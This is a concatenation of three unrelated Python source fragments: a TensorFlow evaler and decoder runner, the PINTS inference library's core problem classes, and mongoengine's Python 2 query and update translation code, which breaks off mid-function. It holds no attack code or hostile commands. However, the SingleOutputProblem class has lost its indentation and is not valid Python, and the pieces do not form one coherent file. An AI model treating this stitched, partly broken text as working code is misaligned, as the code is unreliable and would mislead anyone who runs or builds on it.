        self._RunOnLatestCheckpoints(sess, self._EvalOnce, self._eval_dir)
    if self._should_report_metrics:
      tf.logging.info('Reporting trial done.')
      self._trial.ReportDone()
    tf.logging.info('Evaluation finished.')

  def EvalLatestCheckpoint(self, last_path=None):
    """Runs eval once on the latest checkpoint."""
    with tf.container(
        self._container_id), self._cluster, self._GetSession() as sess:
      # This initializes local tables
      sess.run(self._initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)
      self._task.input.Initialize(sess)
      path = tf.train.latest_checkpoint(self._train_dir)
      if not path:
        tf.logging.info('No checkpoint available.')
        return
      elif path == last_path:
        tf.logging.info('Latest checkpoint was already evaluated.')
        return
      self._EvalOnce(sess, path)

  def EvalCheckpoint(self, ckpt_id):
    """Runs eval once on the checkpoint with the given integer id."""
    with tf.container(self._container_id), self._GetSession() as sess:
      # This initializes local tables
      sess.run(self._initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)
      self._task.input.Initialize(sess)
      path = '{}/ckpt-{:08d}'.format(self._train_dir, ckpt_id)
      self._EvalOnce(sess, path)

  def _RemoveScalarSummaries(self, summaries):
    """Strips all scalar (simple_value) entries from a serialized summary.

    Scalar metrics are reported via aggregated eval metrics instead; only
    non-scalar summaries (images, audio, etc.) are kept.

    Args:
      summaries: a serialized summary_pb2.Summary proto.

    Returns:
      The serialized proto with scalar entries removed.
    """
    proto = summary_pb2.Summary()
    proto.ParseFromString(summaries)
    # Iterate in reverse so deletions do not shift the indices of entries
    # not yet examined (forward deletion would skip consecutive scalars).
    for i in reversed(range(len(proto.value))):
      if proto.value[i].WhichOneof('value') == 'simple_value':
        del proto.value[i]
    return proto.SerializeToString()

  def _EvalOnce(self, sess, path):
    """Runs evaluation for a batch of samples.

    Args:
      sess: the tf Session.
      path: checkpoint path.
    """
    if not FLAGS.evaler_in_same_address_as_controller:
      self._checkpointer.RestoreFromPath(sess, path)
    global_step = sess.run(py_utils.GetGlobalStep())
    # Save any additional information to disk before evaluation.
    if self._export:
      self._task.Export(path)
    # Check after how many steps checkpoint got saved.
    # And decide whether to run an evaluation.
    if global_step < self._task.params.eval.start_eval_after:
      return
    if self._task.input.params.resettable:
      tf.logging.info('Resetting input_generator.')
      self._task.input_generator.Reset(sess)
    metrics_dict = {
        name: metrics.AverageMetric() for name in self._task.eval_metrics
    }
    num_samples_metric = metrics_dict['num_samples_in_batch']
    samples_per_summary = self._task.params.eval.samples_per_summary
    # samples_per_summary == 0 means "evaluate the whole (resettable) set".
    if samples_per_summary == 0:
      assert self._task.input.params.resettable
    while samples_per_summary == 0 or (num_samples_metric.total_value <
                                       samples_per_summary):
      try:
        is_first_loop = num_samples_metric.total_value == 0
        # NOTE: We intentionally do not let FProp generate scalar summaries by
        # default, because evaler calls FProp multiple times for each
        # checkpoint. Multiple summaries at the same step is often confusing.
        # Instead, models should update eval_metrics and generate aggregate
        # summaries. Other types of summaries (images, audio etc.) will be
        # generated for the first eval batch.
        if self._summary_op is not None and is_first_loop:
          ans, summaries = sess.run([self._task.eval_metrics, self._summary_op])
          summaries = self._RemoveScalarSummaries(summaries)
          # Add non-scalar summaries only for the first batch of data.
          self._summary_writer.add_summary(summaries, global_step)
          self._summary_writer.flush()
        else:
          ans = sess.run(self._task.eval_metrics)
        for name, (value, weight) in ans.items():
          metrics_dict[name].Update(value, weight)
        tf.logging.info('Total examples done: %d/%d',
                        num_samples_metric.total_value, samples_per_summary)
      except tf.errors.OutOfRangeError:
        if not self._task.input.params.resettable:
          raise
        break
    # Replace average values with total values for certain metrics.
    if 'num_predictions' in metrics_dict:
      metrics_dict['num_predictions'].total_weight = 1.0
    if 'num_words' in metrics_dict:
      metrics_dict['num_words'].total_weight = 1.0
    self._RunTF2SummaryOps(sess)
    summaries = {k: v.Summary(k) for k, v in metrics_dict.items()}
    summaries['total_samples'] = metrics.CreateScalarSummary(
        'total_samples', num_samples_metric.total_value)
    # When we have evaluated so many samples, generate a summary.
    self._WriteSummaries(
        self._summary_writer,
        os.path.basename(self._eval_dir),
        global_step,
        summaries,
        text_filename=os.path.join(self._eval_dir,
                                   'score-{:08d}.txt'.format(global_step)))
    # Get merged summaries for input data stats logged by the tasks's input
    # generator and write summaries for the stats.
    if self._task.input.merged_input_data_summary_op is not None:
      input_stats_summary_str = sess.run(
          self._task.input.merged_input_data_summary_op)
      self._WriteInputDataStatSummaries(input_stats_summary_str, global_step)
    if self._should_report_metrics:
      tf.logging.info('Reporting eval measure for step %d.' % global_step)
      self._trial.ReportEvalMeasure(global_step, metrics_dict, path)
def GetDecoderDir(logdir, decoder_type, model_task_name):
  """Returns the output directory for a decoder job.

  Args:
    logdir: base log directory.
    decoder_type: decoder job name, e.g. 'decoder_dev'.
    model_task_name: optional task name; appended when truthy.

  Returns:
    The decoder output directory path under `logdir`.
  """
  if model_task_name:
    subdir = '%s_%s' % (decoder_type, model_task_name)
  else:
    subdir = decoder_type
  return os.path.join(logdir, subdir)
def _GetCheckpointIdForDecodeOut(ckpt_id_from_file, global_step):
  """Retrieve the checkpoint id for the decoder out file.

  Compares the checkpoint id found in the checkpoint file name to global
  step. If they diverge, uses the retrieved id and prints a warning.

  Args:
    ckpt_id_from_file: Checkpoint Id from the checkpoint file path.
    global_step: int specifying the global step of the model.

  Returns:
    Checkpoint id as int.
  """
  tf.logging.info('Loaded checkpoint is at global step: %d', global_step)
  tf.logging.info('Checkpoint id according to checkpoint path: %d',
                  ckpt_id_from_file)
  if global_step != ckpt_id_from_file:
    tf.logging.warning(
        'Checkpoint id %d != global step %d. '
        'Will use checkpoint id from checkpoint file for '
        'writing decoder output.', ckpt_id_from_file, global_step)
  # The file-derived id always wins so output filenames match checkpoints.
  return ckpt_id_from_file
class Decoder(base_runner.BaseRunner):
  """Decoder: runs decoding on checkpoints produced by the trainer."""

  def __init__(self, decoder_type, *args, **kwargs):
    super().__init__(*args, **kwargs)
    self._job_name = 'decoder_' + decoder_type
    self.params.cluster.do_eval = True
    self._cluster = cluster_factory.Cluster(self.params.cluster)
    self._decoder_dir = GetDecoderDir(self._logdir, self._job_name,
                                      self._model_task_name)
    tf.io.gfile.makedirs(self._decoder_dir)
    self._decode_path = None
    # Multitask params doesn't have 'task'.
    if 'task' in self.params:
      self._decode_path = checkpointer.GetSpecificCheckpoint(
          self.params.task.eval.load_checkpoint_from)
    self._should_report_metrics = self._job_name.startswith(
        self._cluster.reporting_job)
    with self._graph.as_default(), tf.container(self._container_id):
      self._summary_writer = self._CreateSummaryWriter(self._decoder_dir)
      self._CreateTF2SummaryWriter(self._decoder_dir)
      with self._cluster, tf.device(
          self._cluster.GetPlacer()), self._TF2SummaryContext():
        self._model = self.params.Instantiate()
        self._params = self._model.params
        self._task = self._model.GetTask(self._model_task_name)
        # Note, different graphs are being constructed for different model
        # tasks, which may result in different node names being chosen.
        # Obviously, variable names have to stay the same between train and
        # decode.
        input_batch, self._dec_output = self._model.ConstructDecodeGraph(
            self._model_task_name)
        # Forward CPU-passthrough keys from the input batch into the decode
        # output, unless the decode graph already produced them.
        for key in self._task.input_generator.GetCpuPassthroughKeys():
          if key in input_batch:
            if key in self._dec_output:
              tf.logging.warning(f'Key {key} already present in decode output. '
                                 f'Not adding from input batch.')
            else:
              self._dec_output[key] = input_batch[key]
        self._summary_op = tf.summary.merge_all()
        self._checkpointer = self._CreateCheckpointer(self._train_dir,
                                                      self._model)
      self._CreateTF2SummaryOps()
      self._initialize_tables = tf.tables_initializer()
      self._initialize_local_vars = tf.local_variables_initializer()
      # No queues are allowed for decoder models.
      self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
      assert not self.enqueue_ops
    # Saves the graph def.
    self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt')
    if self.params.cluster.task == 0:
      tf.io.write_graph(self._graph.as_graph_def(), self._decoder_dir,
                        '%s.pbtxt' % self._job_name)

  def Start(self):
    """Starts the decode loop on a background runner thread."""
    super().Start()
    self._RunLoop(self._job_name, self._Loop)

  def _Loop(self):
    """The main loop: decodes checkpoints until done."""
    with tf.container(self._container_id), self._cluster, self._GetSession(
        inline=False) as sess:
      # This initializes local tables
      sess.run(self._initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)
      self._InitializeTF2SummaryWriter(sess)
      self._task.input.Initialize(sess)
      if self._decode_path:
        self.DecodeCheckpoint(sess, self._decode_path)
        py_utils.UpdateProcessedCheckpoints(self._decoder_dir,
                                            self._decode_path)
      elif self._task.params.eval.decode_all_checkpoints:
        self._RunOnAllCheckpoints(sess, self.DecodeCheckpoint,
                                  self._decoder_dir)
      else:
        self._RunOnLatestCheckpoints(sess, self.DecodeCheckpoint,
                                     self._decoder_dir)
    if self._should_report_metrics:
      tf.logging.info('Reporting trial done.')
      self._trial.ReportDone()
    tf.logging.info('Decoding finished.')

  @classmethod
  def GetDecodeOutPath(cls, decoder_dir, checkpoint_id):
    """Gets the path to decode out file."""
    out_dir = cls._GetTtlDir(decoder_dir, duration='7d')
    return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id)

  def GetCkptIdFromFile(self, checkpoint_path):
    """Parses the integer checkpoint id out of a '...ckpt-<id>' path."""
    return int(re.sub(r'.*ckpt-', '', checkpoint_path))

  def _RemoveScalarSummaries(self, summaries):
    """Strips all scalar (simple_value) entries from a serialized summary.

    Scalar metrics are reported via aggregated decoder metrics instead; only
    non-scalar summaries (images, audio, etc.) are kept.

    Args:
      summaries: a serialized tf.Summary proto.

    Returns:
      The serialized proto with scalar entries removed.
    """
    proto = tf.Summary()
    proto.ParseFromString(summaries)
    # Iterate in reverse so deletions do not shift the indices of entries
    # not yet examined (forward deletion would skip consecutive scalars).
    for i in reversed(range(len(proto.value))):
      if proto.value[i].WhichOneof('value') == 'simple_value':
        del proto.value[i]
    return proto.SerializeToString()

  def DecodeCheckpoint(self, sess, checkpoint_path):
    """Decodes `samples_per_summary` examples using `checkpoint_path`."""
    p = self._task.params
    ckpt_id_from_file = self.GetCkptIdFromFile(checkpoint_path)
    if ckpt_id_from_file < p.eval.start_decoder_after:
      return
    samples_per_summary = p.eval.decoder_samples_per_summary
    if samples_per_summary is None:
      samples_per_summary = p.eval.samples_per_summary
    # samples_per_summary == 0 means "decode the whole (resettable) set".
    if samples_per_summary == 0:
      assert self._task.input.params.resettable
    self._checkpointer.RestoreFromPath(sess, checkpoint_path)
    global_step = sess.run(py_utils.GetGlobalStep())
    if self._task.input.params.resettable:
      tf.logging.info('Resetting input_generator.')
      self._task.input.Reset(sess)
    dec_metrics = self._task.CreateDecoderMetrics()
    if not dec_metrics:
      tf.logging.info('Empty decoder metrics')
      return
    buffered_decode_out = []
    num_examples_metric = dec_metrics['num_samples_in_batch']
    start_time = time.time()
    while samples_per_summary == 0 or (num_examples_metric.total_value <
                                       samples_per_summary):
      try:
        is_first_loop = num_examples_metric.total_value == 0
        tf.logging.info('Fetching dec_output.')
        fetch_start = time.time()
        run_options = tf.RunOptions(report_tensor_allocations_upon_oom=False)
        # NOTE: We intentionally do not generate scalar summaries by
        # default, because decoder is run multiple times for each
        # checkpoint. Multiple summaries at the same step is often confusing.
        # Instead, models should generate aggregate summaries using
        # PostProcessDecodeOut. Other types of summaries (images, audio etc.)
        # will be generated for the first eval batch.
        if self._summary_op is not None and is_first_loop:
          dec_out, summaries = sess.run([self._dec_output, self._summary_op],
                                        options=run_options)
          summaries = self._RemoveScalarSummaries(summaries)
          # Add non-scalar summaries only for the first batch of data.
          self._summary_writer.add_summary(summaries, global_step)
          self._summary_writer.flush()
        else:
          dec_out = sess.run(self._dec_output, options=run_options)
        self._RunTF2SummaryOps(sess)
        post_process_start = time.time()
        tf.logging.info('Done fetching (%f seconds)' %
                        (post_process_start - fetch_start))
        decode_out = self._task.PostProcessDecodeOut(dec_out, dec_metrics)
        if decode_out:
          if isinstance(decode_out, dict):
            decode_out = decode_out.items()
          if is_first_loop:
            # Add summaries only for the first batch of data.
            for key, value in decode_out:
              if isinstance(value, tf.Summary):
                tf.logging.info(f'Adding summary {key} with tags '
                                f'{[x.tag for x in value.value]}.')
                self._summary_writer.add_summary(value, global_step)
            self._summary_writer.flush()
          # Buffer everything that is not a summary for DecodeFinalize below.
          buffered_decode_out.extend(
              kv for kv in decode_out if not isinstance(kv[1], tf.Summary))
        tf.logging.info(
            'Total examples done: %d/%d '
            '(%f seconds decode postprocess)', num_examples_metric.total_value,
            samples_per_summary,
            time.time() - post_process_start)
      except tf.errors.OutOfRangeError:
        if not self._task.input.params.resettable:
          raise
        break
    tf.logging.info('Done decoding ckpt: %s', checkpoint_path)
    summaries = {k: v.Summary(k) for k, v in dec_metrics.items()}
    elapsed_secs = time.time() - start_time
    example_rate = num_examples_metric.total_value / elapsed_secs
    summaries['examples/sec'] = metrics.CreateScalarSummary(
        'examples/sec', example_rate)
    summaries['total_samples'] = metrics.CreateScalarSummary(
        'total_samples', num_examples_metric.total_value)
    self._WriteSummaries(
        self._summary_writer,
        os.path.basename(self._decoder_dir),
        global_step,
        summaries,
        text_filename=os.path.join(self._decoder_dir,
                                   'score-{:08d}.txt'.format(global_step)))
    self._ExportMetrics(
        # Metrics expects python int, but global_step is numpy.int64.
        decode_checkpoint=int(global_step),
        dec_metrics=dec_metrics,
        example_rate=example_rate)
    # global_step and the checkpoint id from the checkpoint file might be
    # different. For consistency of checkpoint filename and decoder_out
    # file, use the checkpoint id as derived from the checkpoint filename.
    checkpoint_id = _GetCheckpointIdForDecodeOut(ckpt_id_from_file, global_step)
    decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id)
    decode_finalize_args = base_model.DecodeFinalizeArgs(
        decode_out_path=decode_out_path, decode_out=buffered_decode_out)
    self._task.DecodeFinalize(decode_finalize_args)
    if self._should_report_metrics:
      tf.logging.info('Reporting eval measure for step %d.' % global_step)
      self._trial.ReportEvalMeasure(global_step, dec_metrics, checkpoint_path)

  def DecodeLatestCheckpoint(self, last_path=None):
    """Runs decoder on the latest checkpoint."""
    with tf.container(
        self._container_id), self._cluster, self._GetSession() as sess:
      # This initializes local tables
      sess.run(self._initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)
      self._task.input.Initialize(sess)
      path = tf.train.latest_checkpoint(self._train_dir)
      if not path:
        tf.logging.info('No checkpoint available.')
        return
      elif path == last_path:
        tf.logging.info('Latest checkpoint was already decoded.')
        return
      self.DecodeCheckpoint(sess, path)
|
|
#
# Core modules and methods
#
# This file is part of PINTS (https://github.com/pints-team/pints/) which is
# released under the BSD 3-clause license. See accompanying LICENSE.md for
# copyright notice and full license details.
#
import numpy as np
import pints
class ForwardModel(object):
    """
    Interface that user-supplied forward models must implement.

    Subclasses of ``ForwardModel`` may implement the required methods in
    pure Python, or delegate to other languages (e.g. through Python
    wrappers around C code).
    """

    def __init__(self):
        super(ForwardModel, self).__init__()

    def n_outputs(self):
        """
        Returns the number of outputs this model has. The default is 1.
        """
        return 1

    def n_parameters(self):
        """
        Returns the dimension of the parameter space.
        """
        raise NotImplementedError

    def simulate(self, parameters, times):
        """
        Runs a forward simulation with the given ``parameters`` and returns a
        time-series with data points corresponding to the given ``times``.

        Returns a sequence of length ``n_times`` (for single output problems)
        or a NumPy array of shape ``(n_times, n_outputs)`` (for multi-output
        problems), representing the values of the model at the given ``times``.

        Parameters
        ----------
        parameters
            An ordered sequence of parameter values.
        times
            The times at which to evaluate. Must be an ordered sequence,
            without duplicates, and without negative values.
            All simulations are started at time 0, regardless of whether this
            value appears in ``times``.
        """
        raise NotImplementedError
class ForwardModelS1(ForwardModel):
    """
    Interface for forward models that can also compute the first-order
    derivative of their simulated values with respect to the parameters.

    Extends :class:`pints.ForwardModel`.
    """

    def __init__(self):
        super(ForwardModelS1, self).__init__()

    def simulateS1(self, parameters, times):
        """
        Runs a forward simulation with the given ``parameters``, returning
        both the simulated time-series at the given ``times`` and the
        sensitivities of that simulation with respect to the parameters.

        Parameters
        ----------
        parameters
            An ordered list of parameter values.
        times
            The times at which to evaluate. Must be an ordered sequence,
            without duplicates, and without negative values.
            All simulations are started at time 0, regardless of whether this
            value appears in ``times``.

        Returns
        -------
        y
            The simulated values, as a sequence of ``n_times`` values, or
            a NumPy array of shape ``(n_times, n_outputs)``.
        y'
            The corresponding derivatives, as a NumPy array of shape
            ``(n_times, n_parameters)`` or an array of shape
            ``(n_times, n_outputs, n_parameters)``.
        """
        raise NotImplementedError
class SingleOutputProblem(object):
"""
Represents an inference problem where a model is fit to a single time
series, such as measured from a system with a single output.
Parameters
----------
model
A model or model wrapper extending :class:`ForwardModel`.
times
A sequence of points in time. Must be non-negative and increasing.
values
A sequence of scalar output values, measured at the times in ``times``.
"""
def __init__(self, model, times, values):
# Check model
self._model = model
if model.n_outputs() != 1:
raise ValueError(
'Only single-output models can be used for a'
' SingleOutputProblem.')
# Check times, copy so that they can no longer be changed and set them
# to read-only
self._times = pints.vector(times)
if np.any(self._times < 0):
raise ValueError('Times can not be negative.')
if np.any(self._times[:-1] >= self._times[1:]):
raise ValueError('Times must be increasing.')
# Check values, copy so that they can no longer be changed
self._values = pints.vector(values)
# Check dimensions
self._n_parameters = int(model.n_parameters())
self._n_times = len(self._times)
# Check times and values array have write shape
if len(self._values) != self._n_times:
raise ValueError(
'Times and values arrays must have same length.')
def evaluate(self, parameters):
"""
Runs a simulation using the given parameters, returning the simulated
values as a NumPy array of shape ``(n_times,)``.
"""
y = np.asarray(self._model.simulate(parameters, self._times))
return y.reshape((self._n_times,))
def evaluateS1(self, parameters):
"""
Runs a simulation with first-order sensitivity calculation, returning
the simulated values and derivatives.
The returned data is a tuple of NumPy arrays ``(y, y')``, where ``y``
has shape ``(self._n_times,)`` while ``y'`` has shape
``(n_times, n_parameters)``.
*This method only works for problems with a model that implements the
:class:`ForwardModelS1` interface.*
"""
y, dy = self._model.simulateS1(parameters, self._times)
return (
np.asarray(y).reshape((self._n_times,)),
np.asarray(dy).reshape((self._n_times, self._n_parameters))
)
def n_outputs(self):
"""
Returns the number of outputs for this problem (always 1).
"""
return 1
def n_parameters(self):
"""
Returns the dimension (the number of parameters) of this problem.
"""
return self._n_parameters
def n_times(self):
    """
    Returns the number of sampling points, i.e. the length of the arrays
    returned by :meth:`times()` and :meth:`values()`.
    """
    return self._n_times
def times(self):
    """
    Returns this problem's sampling times as a read-only NumPy array of
    shape ``(n_times, )``.
    """
    return self._times
def values(self):
    """
    Returns this problem's measured values as a read-only NumPy array of
    shape ``(n_times, )``.
    """
    return self._values
class MultiOutputProblem(object):
    """
    An inference problem in which a multi-output forward model is matched
    against a multi-valued time series (e.g. measurements from a system
    with several outputs).

    Parameters
    ----------
    model
        A model or model wrapper extending :class:`ForwardModel`.
    times
        A sequence of points in time. Must be non-negative and
        non-decreasing.
    values
        A sequence of multi-valued measurements of shape
        ``(n_times, n_outputs)``.
    """

    def __init__(self, model, times, values):
        self._model = model

        # Keep a read-only copy of the times and validate them.
        self._times = pints.vector(times)
        if np.any(self._times < 0):
            raise ValueError('Times cannot be negative.')
        if np.any(self._times[:-1] > self._times[1:]):
            raise ValueError('Times must be non-decreasing.')

        # Keep a read-only 2d copy of the measured values.
        self._values = pints.matrix2d(values)

        # Cache problem dimensions.
        self._n_parameters = int(model.n_parameters())
        self._n_outputs = int(model.n_outputs())
        self._n_times = len(self._times)

        # The values must line up with the times and outputs.
        if self._values.shape != (self._n_times, self._n_outputs):
            raise ValueError(
                'Values array must have shape `(n_times, n_outputs)`.')

    def evaluate(self, parameters):
        """
        Simulates the model with the given ``parameters`` and returns the
        result as a NumPy array of shape ``(n_times, n_outputs)``.
        """
        raw = self._model.simulate(parameters, self._times)
        return np.reshape(np.asarray(raw), (self._n_times, self._n_outputs))

    def evaluateS1(self, parameters):
        """
        Simulates the model with first-order sensitivity calculation.

        Returns a tuple ``(y, y')`` where ``y`` has shape
        ``(n_times, n_outputs)`` and ``y'`` has shape
        ``(n_times, n_outputs, n_parameters)``.

        *This method only works for problems whose model implements the
        :class:`ForwardModelS1` interface.*
        """
        raw, raw_dot = self._model.simulateS1(parameters, self._times)
        shape = (self._n_times, self._n_outputs)
        y = np.reshape(np.asarray(raw), shape)
        dy = np.reshape(np.asarray(raw_dot), shape + (self._n_parameters,))
        return y, dy

    def n_outputs(self):
        """
        Returns the number of outputs for this problem.
        """
        return self._n_outputs

    def n_parameters(self):
        """
        Returns the dimension (the number of parameters) of this problem.
        """
        return self._n_parameters

    def n_times(self):
        """
        Returns the number of sampling points, i.e. the length of the
        arrays returned by :meth:`times()` and :meth:`values()`.
        """
        return self._n_times

    def times(self):
        """
        Returns this problem's sampling times as a read-only NumPy array.
        """
        return self._times

    def values(self):
        """
        Returns this problem's measured values as a read-only NumPy array
        of shape ``(n_times, n_outputs)``.
        """
        return self._values
class TunableMethod(object):
    """
    Interface for a numerical method whose behaviour is controlled by a
    number of "hyper-parameters".

    Optimisers and samplers expose individual setters for each of their
    hyper-parameters; this interface adds a single generic entry point so
    that, for example, an optimiser can be used to tune another method's
    hyper-parameters.

    :meth:`set_hyper_parameters` receives an array whose entries may all
    share one type (e.g. a NumPy array), so implementations should coerce
    each entry to the type they need (e.g. ``int(x[0])``) rather than
    raising on a float where an int was expected.
    """

    def n_hyper_parameters(self):
        """
        Returns the number of hyper-parameters for this method (see
        :class:`TunableMethod`).
        """
        return 0

    def set_hyper_parameters(self, x):
        """
        Sets the hyper-parameters for the method with the given vector of
        values (see :class:`TunableMethod`).

        Parameters
        ----------
        x
            An array of length ``n_hyper_parameters`` used to set the
            hyper-parameters.
        """
        pass
|
|
from collections import defaultdict
import pymongo
from bson import SON
from mongoengine.base.fields import UPDATE_OPERATORS
from mongoengine.connection import get_connection
from mongoengine.common import _import_class
from mongoengine.errors import InvalidQueryError
from mongoengine.python_support import IS_PYMONGO_3
__all__ = ('query', 'update')

# Operators that compare a field against a value, or negate/compose such
# comparisons.
COMPARISON_OPERATORS = ('ne', 'gt', 'gte', 'lt', 'lte', 'in', 'nin', 'mod',
                        'all', 'size', 'exists', 'not', 'elemMatch', 'type')

# Geospatial query operators (both legacy 2d and GeoJSON variants).
GEO_OPERATORS = ('within_distance', 'within_spherical_distance',
                 'within_box', 'within_polygon', 'near', 'near_sphere',
                 'max_distance', 'min_distance', 'geo_within', 'geo_within_box',
                 'geo_within_polygon', 'geo_within_center',
                 'geo_within_sphere', 'geo_intersects')

# String-matching operators.
STRING_OPERATORS = ('contains', 'icontains', 'startswith',
                    'istartswith', 'endswith', 'iendswith',
                    'exact', 'iexact')

# Operators given special handling in query().
CUSTOM_OPERATORS = ('match',)

# Every operator recognised at the end of a query keyword
# (e.g. ``field__gte=3``).
MATCH_OPERATORS = (COMPARISON_OPERATORS + GEO_OPERATORS +
                   STRING_OPERATORS + CUSTOM_OPERATORS)
def query(_doc_cls=None, **kwargs):
    """Transform a query from Django-style format to Mongo format.

    Keyword names use ``__`` to separate field names, positional indices
    and an optional trailing operator (e.g. ``name__icontains='x'``).
    A ``__raw__`` keyword is merged into the result untouched.
    """
    mongo_query = {}
    # Values that must later be combined under ``$and`` because the same
    # key was constrained more than once.
    merge_query = defaultdict(list)
    for key, value in sorted(kwargs.items()):
        if key == "__raw__":
            mongo_query.update(value)
            continue

        # Split into parts; purely numeric parts are positional indices
        # and are re-inserted after field-name resolution below.
        parts = key.rsplit('__')
        indices = [(i, p) for i, p in enumerate(parts) if p.isdigit()]
        parts = [part for part in parts if not part.isdigit()]

        # Check for an operator and transform to mongo-style if there is
        op = None
        if len(parts) > 1 and parts[-1] in MATCH_OPERATORS:
            op = parts.pop()

        # Allow escaping an operator-like field name with a trailing __
        if len(parts) > 1 and parts[-1] == "":
            parts.pop()

        negate = False
        if len(parts) > 1 and parts[-1] == 'not':
            parts.pop()
            negate = True

        if _doc_cls:
            # Switch field names to proper names [set in Field(name='foo')]
            try:
                fields = _doc_cls._lookup_field(parts)
            except Exception, e:
                raise InvalidQueryError(e)
            parts = []

            CachedReferenceField = _import_class('CachedReferenceField')

            cleaned_fields = []
            for field in fields:
                append_field = True
                if isinstance(field, basestring):
                    parts.append(field)
                    append_field = False
                # is last and CachedReferenceField
                elif isinstance(field, CachedReferenceField) and fields[-1] == field:
                    # Cached references are matched on their stored _id.
                    parts.append('%s._id' % field.db_field)
                else:
                    parts.append(field.db_field)

                if append_field:
                    cleaned_fields.append(field)

            # Convert value to proper value
            field = cleaned_fields[-1]

            # Operators that take a single value (as opposed to a list).
            singular_ops = [None, 'ne', 'gt', 'gte', 'lt', 'lte', 'not']
            singular_ops += STRING_OPERATORS
            if op in singular_ops:
                if isinstance(field, basestring):
                    if (op in STRING_OPERATORS and
                            isinstance(value, basestring)):
                        StringField = _import_class('StringField')
                        value = StringField.prepare_query_value(op, value)
                    else:
                        value = field
                else:
                    value = field.prepare_query_value(op, value)

                    if isinstance(field, CachedReferenceField) and value:
                        value = value['_id']

            elif op in ('in', 'nin', 'all', 'near') and not isinstance(value, dict):
                # 'in', 'nin' and 'all' require a list of values
                value = [field.prepare_query_value(op, v) for v in value]

        # if op and op not in COMPARISON_OPERATORS:
        if op:
            if op in GEO_OPERATORS:
                value = _geo_operator(field, op, value)
            elif op in ('match', 'elemMatch'):
                ListField = _import_class('ListField')
                EmbeddedDocumentField = _import_class('EmbeddedDocumentField')
                if (isinstance(value, dict) and isinstance(field, ListField) and
                        isinstance(field.field, EmbeddedDocumentField)):
                    # Recurse to build the embedded-document sub-query.
                    value = query(field.field.document_type, **value)
                else:
                    value = field.prepare_query_value(op, value)
                value = {"$elemMatch": value}
            elif op in CUSTOM_OPERATORS:
                # NOTE(review): this exception is instantiated but never
                # raised -- a ``raise`` appears to be missing here.
                NotImplementedError("Custom method '%s' has not "
                                    "been implemented" % op)
            elif op not in STRING_OPERATORS:
                value = {'$' + op: value}

        if negate:
            value = {'$not': value}

        # Re-insert the positional indices and build the dotted key.
        for i, part in indices:
            parts.insert(i, part)

        key = '.'.join(parts)

        if op is None or key not in mongo_query:
            mongo_query[key] = value
        elif key in mongo_query:
            if key in mongo_query and isinstance(mongo_query[key], dict):
                mongo_query[key].update(value)
                # $max/minDistance needs to come last - convert to SON
                value_dict = mongo_query[key]
                if ('$maxDistance' in value_dict or '$minDistance' in value_dict) and \
                        ('$near' in value_dict or '$nearSphere' in value_dict):
                    value_son = SON()
                    for k, v in value_dict.iteritems():
                        if k == '$maxDistance' or k == '$minDistance':
                            continue
                        value_son[k] = v
                    # Required for MongoDB >= 2.6, may fail when combining
                    # PyMongo 3+ and MongoDB < 2.6
                    near_embedded = False
                    for near_op in ('$near', '$nearSphere'):
                        if isinstance(value_dict.get(near_op), dict) and (
                                IS_PYMONGO_3 or get_connection().max_wire_version > 1):
                            value_son[near_op] = SON(value_son[near_op])
                            if '$maxDistance' in value_dict:
                                value_son[near_op][
                                    '$maxDistance'] = value_dict['$maxDistance']
                            if '$minDistance' in value_dict:
                                value_son[near_op][
                                    '$minDistance'] = value_dict['$minDistance']
                            near_embedded = True
                    if not near_embedded:
                        if '$maxDistance' in value_dict:
                            value_son['$maxDistance'] = value_dict['$maxDistance']
                        if '$minDistance' in value_dict:
                            value_son['$minDistance'] = value_dict['$minDistance']
                    mongo_query[key] = value_son
            else:
                # Store for manually merging later
                merge_query[key].append(value)

    # The queryset has been filtered in such a way we must manually merge
    for k, v in merge_query.items():
        merge_query[k].append(mongo_query[k])
        del mongo_query[k]
        if isinstance(v, list):
            value = [{k: val} for val in v]
            if '$and' in mongo_query.keys():
                mongo_query['$and'].extend(value)
            else:
                mongo_query['$and'] = value

    return mongo_query
def update(_doc_cls=None, **update):
    """Transform an update spec from Django-style format to Mongo format.

    Keyword names are ``operator__field__...`` (e.g. ``inc__count=1``);
    when no operator is given, ``set`` is assumed. A ``__raw__`` keyword
    is merged into the result untouched.
    """
    mongo_update = {}
    for key, value in update.items():
        if key == "__raw__":
            mongo_update.update(value)
            continue

        parts = key.split('__')

        # if there is no operator, default to "set"
        if len(parts) < 3 and parts[0] not in UPDATE_OPERATORS:
            parts.insert(0, 'set')

        # Check for an operator and transform to mongo-style if there is
        op = None
        if parts[0] in UPDATE_OPERATORS:
            op = parts.pop(0)
            # Convert Pythonic names to Mongo equivalents
            if op in ('push_all', 'pull_all'):
                op = op.replace('_all', 'All')
            elif op == 'dec':
                # Support decrement by flipping a positive value's sign
                # and using 'inc'
                op = 'inc'
                if value > 0:
                    value = -value
            elif op == 'add_to_set':
                op = 'addToSet'
            elif op == 'set_on_insert':
                op = "setOnInsert"

        # A trailing comparison operator (e.g. ``pull__sizes__gt=5``)
        # becomes a match condition on the value.
        match = None
        if parts[-1] in COMPARISON_OPERATORS:
            match = parts.pop()

        if _doc_cls:
            # Switch field names to proper names [set in Field(name='foo')]
            try:
                fields = _doc_cls._lookup_field(parts)
            except Exception, e:
                raise InvalidQueryError(e)
            parts = []

            cleaned_fields = []
            appended_sub_field = False
            for field in fields:
                append_field = True
                if isinstance(field, basestring):
                    # Convert the S operator to $
                    if field == 'S':
                        field = '$'
                    parts.append(field)
                    append_field = False
                else:
                    parts.append(field.db_field)
                if append_field:
                    appended_sub_field = False
                    cleaned_fields.append(field)
                    if hasattr(field, 'field'):
                        # Also remember the contained field of container
                        # fields, so values can be prepared per-item.
                        cleaned_fields.append(field.field)
                        appended_sub_field = True

            # Convert value to proper value
            if appended_sub_field:
                field = cleaned_fields[-2]
            else:
                field = cleaned_fields[-1]

            GeoJsonBaseField = _import_class("GeoJsonBaseField")
            if isinstance(field, GeoJsonBaseField):
                value = field.to_mongo(value)

            if op in (None, 'set', 'push', 'pull'):
                if field.required or value is not None:
                    value = field.prepare_query_value(op, value)
            elif op in ('pushAll', 'pullAll'):
                value = [field.prepare_query_value(op, v) for v in value]
